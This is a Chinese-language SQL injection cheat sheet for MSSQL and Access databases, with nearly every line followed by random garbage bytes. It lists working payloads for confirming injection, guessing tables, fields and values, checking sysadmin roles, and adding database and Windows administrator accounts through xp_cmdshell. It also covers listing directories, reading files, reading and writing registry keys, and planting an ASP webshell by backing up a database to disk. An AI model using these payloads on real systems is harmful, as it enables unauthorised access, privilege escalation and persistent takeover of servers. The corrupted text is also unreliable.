1.判断是否有注入;and 1=1 ;and 1=2 -/B*�\X�[�
2.初步判断是否是mssql ;and user>0 w Ad�a�P9h
s�!��D?�%�
3.注入参数是字符'and [查询条件] and ''=' xh<{�lZ)KJ
3HR)H-@6@7
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��1x/��R
8k�d):gZKZ
5.判断数据库系统 �Hs�ov��0�
(6H�7�?n�v
;and (select count(*) from sysobjects)>0 mssql ('uUf�!h?\
�P!���j*4t
;and (select count(*) from msysobjects)>0 access l{?9R���.L
�|'o<w
]hc
�2YQBw,�gG
�mW[w4J+7P
6.猜数据库 ;and (select Count(*) from [数据库名])>0 IcqzMm��b
Q;y4yJ$�wI
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 5>e<|@2
X�
Ys��iH=x��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �vKPLh�� �
%RwWyzm#�\
9.(1)猜字段的ascii值(access) n/�Bo��K6g
��xi<}��n#
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ['�>r� t�V
Zs0;��92WL
(2)猜字段的ascii值(mssql) Zn*W2s^�^{
WHjJ��R���
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 X�mVs�t*2=
`z/��p,. u
10.测试权限结构(mssql) ���N5#j}tT
R�vU'8Y?>w
�D'D� �IC
v1��3\�y^t
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Mw+
l�>9�2
6_rg��Ro�&
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- JX>�`N5�s�
j��~�+(#�|
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- @kT@IQ�kri
}43qpJ�e8U
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- vz:��VegS�
M�R@Qn[RdM
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- EN}4-�P/�5
�KL(s�Vj^e
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- >�x~Qa�@s;
A'u]z�\&%c
;and 1=(select IS_MEMBER('db_owner'));-- tK+�Jm�bB\
?hp,h3s;n$
M0�vX�9�;J
�!xg10N}I�
11.添加mssql和系统的帐户 �09Q5��gal
�"�~K�ph0-
;exec master.dbo.sp_addlogin username;-- >wYmx4��W>
;exec master.dbo.sp_password null,username,password;-- n�s/*WH&[x
|{�%$x^KyJ
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �*cX�i*7|=
�6I�_��4�{
;exec master.dbo.xp_cmdshell 'net user username password cV`NQ�t�<W
v$;U�RF%�^
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ,k@�i��Nid
7''�iT{-[p
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ���c&<Ei1
B���G�4TUt
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �l�\m�7~�
v�y-(:aH7U
R:��^jQ'1�
}U}ppq0E�o
12.(1)遍历目录 BOdl�z�#&s
NU��h%�\{�
;create table dirs(paths varchar(100), id int) NP!LBB)=Y
g>b{hkIXg
;insert dirs exec master.dbo.xp_dirtree 'c:\' 931GJ�A~�g
o~xGE�6A*"
;and (select top 1 paths from dirs)>0 �d?�/�g5[
��pma�=�*
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) R$e�E�W�"]
�Q!AGalP z
(A?w|/bZd�
0}:Wh��&�g
(2)遍历目录 9RK��.�+�2
I����&&;a.
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- MQ'��=�qR
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �}-Nc��}%5
i�\4YT r,�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ���S�%G&{5
�;D(6Gy�9~
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 .F� _u/"**
N�J$Qm�.S�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 f&�Sovuuh�
#z*,-��EV|
4z�OFu/l6R
UQb|J�9HY4
13.mssql中的存储过程 ��#�>z�!ns
;c@B�+RquR
xp_regenumvalues 注册表根键, 子键 �I3�4
1s�0
uaLj���HR0
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 8|!�"CQJ|H
(Db�a!z�Ss
xp_regread 根键,子键,键值名 XZTH[#MqeI
KfC{�/J\
�
;exec xp_regread mZ�nsr@�KF
eG �dFupfz
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ).��tTDZ
�
h>��z5�m��
xp_regwrite 根键,子键, 值名, 值类型, 值 ����z_�(4�
>�@-BZJg/k
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ���
�z'��5
8&1xb@�Nc7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 }_+)�:<Db�
ij}{H#�0S-
xp_regdeletevalue 根键,子键,值名 �<)�L[�V�
'�RQEkt�m
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �&�EC8{.7�
4~�vn%�O6n
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �%Go�/\g �
�2c��*}1
_
Q}
-YD.bx3
Uw)B(;Hy�?
14.mssql的backup创建webshell :o:�/RR�p[
��O��/&Qzt
use model #�!�(2@N8�
I;{Ua�*���
create table cmd(str image); IFt�ao�K
9T2y2d�!X
insert into cmd(str) values (''); <#�./q LSR
�3CSw���cD
backup database model to disk='c:\l.asp'; A(+V{1��L'
Hm~.u.�)\.
Ga
<=�Di):
;hd%w�mE�
15.mssql内置函数 !xU\s'I+#�
#=F{G4d)!=
;and (select @@version)>0 获得Windows的版本号 8S���upoS�
u��y|]@|J
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ���(3j f_�
BY�$L[U;@T
;and (select user_name())>0 爆当前系统的连接用户 I5Rd�~-="G
)~w
bu�2�;
;and (select db_name())>0 得到当前连接的数据库 �)L"J�?wTe
�_~y-?(46K
|g<l|lqz�|
��LZJFp��@
16.简洁的webshell <yw=+hz[�u
M'NOM>��8
use model 1CU�I6@Cz)
>GDf*
ox[�
create table cmd(str image); vU#>3[��aC
)<5hga][~a
insert into cmd(str) values (''); �0�/~{�,��
9G[t
&���r
backup database model to disk='g:\wwwtest\l.asp';
